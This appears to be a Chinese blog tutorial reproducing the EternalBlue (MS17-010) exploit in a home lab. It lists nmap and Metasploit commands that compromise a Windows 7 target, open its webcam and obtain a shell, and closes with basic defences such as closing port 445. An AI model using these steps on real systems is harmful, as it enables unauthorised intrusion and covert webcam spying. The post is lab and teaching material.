“永恒之蓝”漏洞的复现


  • 环境准备

kali虚拟机,windows7靶机

  • 实验操作

因为在同一局域网,利用kali 输入指令ifconfig扫描出本机地址为193.168.56.131  ;再输入指令nmap -sn 192.168.56.1/24 扫出windows7靶机ip地址为192.168.56.142

先尝试用kali ping 一下,windows7靶机的ip地址看看能不能ping通(注意的是,windows7防火墙要关闭才能ping通),结果是能ping通的

 

 

打开kali的msfconsole端口

 

输入指令  search ms17_010

 

根据上图端口目录,我的机子用的是端口3,所以输入 use 3

show options

 

这时就要用到靶机的ip地址了,输入 set rhosts ip地址

show options  

 

 

在输入  run

run结束后在打开一个终端

输入search ms17_010

按照刚刚所看端口,我要使用的攻击是端口2

所以输入 use 2

show options

 

再次输入set rhosts 靶机ip地址

run

run成功的话,会出现一个win

 

 

接下来就可以进行攻击操作了

输入指令webcam_stream,打开了靶机的摄像头(假如靶机没看摄像头,要打开)

(这样就是打开摄像头了)

输入指令shell拿到高级控制权

当然,还有很多指令操作我就不一一列举了

最后,在被入侵前后,windows7也是能自查的

在windows7控制面版输入 netstat即可查看被入侵前后端口连接的状态

入侵前

入侵后

可以发现,入侵后windows7的445端口被连接了,所以我们也得出了防范该漏洞的一些简单操作:

  1. 打开防火墙进行防范病毒
  2. 针对这个病毒,平时把445端口关闭即可
  3. 健康上网,不浏览不明网站等
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

街头诗人_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值